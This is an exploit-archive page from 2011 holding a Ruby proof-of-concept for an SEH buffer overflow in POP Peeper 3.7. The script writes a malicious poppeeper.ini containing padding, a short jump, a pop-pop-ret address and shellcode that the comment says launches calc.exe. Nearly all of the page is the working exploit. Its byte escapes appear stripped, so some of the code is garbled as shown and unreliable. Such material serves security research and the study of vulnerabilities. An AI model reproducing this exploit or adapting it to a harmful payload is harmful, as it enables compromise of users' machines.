Home / exploits POP Peeper 3.7 SEH Overflow
Posted on 19 March 2011
#!/usr/bin/ruby ############################################################################# # Title: POP Peeper 3.7 SEH Exploit # Tested on: Windows XP SP2 EN # Target: POP Peeper 3.7.0.0 # Download Link: http://www.poppeeper.com/download.php # Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com # Greetz: offsec team, inj3ct0r team ############################################################################# appdata = ENV['APPDATA'] file = appdata +"\POP Peeper\poppeeper.ini" f = open(file, "wb") eb = "xebx06x90x90" ppr = "x67x15xD3x74" #Module Name=C:WINDOWSsystem32oledlg.dll version=1.0 (XPClient.010817-1148) #Spawn calc.exe, bad characters: x00x0ax0d shellcode = ("xddxc3xd9x74x24xf4x5axb8x30xe7x16x7dx33xc9" + "xb1x33x31x42x17x83xc2x04x03x72xf4xf4x88x8e" + "x12x71x72x6exe3xe2xfax8bxd2x30x98xd8x47x85" + "xeax8cx6bx6exbex24xffx02x17x4bx48xa8x41x62" + "x49x1cx4ex28x89x3ex32x32xdexe0x0bxfdx13xe0" + "x4cxe3xdcxb0x05x68x4ex25x21x2cx53x44xe5x3b" + "xebx3ex80xfbx98xf4x8bx2bx30x82xc4xd3x3axcc" + "xf4xe2xefx0exc8xadx84xe5xbax2cx4dx34x42x1f" + "xb1x9bx7dx90x3cxe5xbax16xdfx90xb0x65x62xa3" + "x02x14xb8x26x97xbex4bx90x73x3fx9fx47xf7x33" + "x54x03x5fx57x6bxc0xebx63xe0xe7x3bxe2xb2xc3" + "x9fxafx61x6dxb9x15xc7x92xd9xf1xb8x36x91x13" + "xacx41xf8x79x33xc3x86xc4x33xdbx88x66x5cxea" + "x03xe9x1bxf3xc1x4exd3xb9x48xe6x7cx64x19xbb" + "xe0x97xf7xffx1cx14xf2x7fxdbx04x77x7axa7x82" + "x6bxf6xb8x66x8cxa5xb9xa2xefx28x2ax2exdexcf" + "xcaxd5x1e") f.write(" [Act_"+"x41"*1088+eb+ppr+shellcode+"] Enabled = 1 ") f.close()
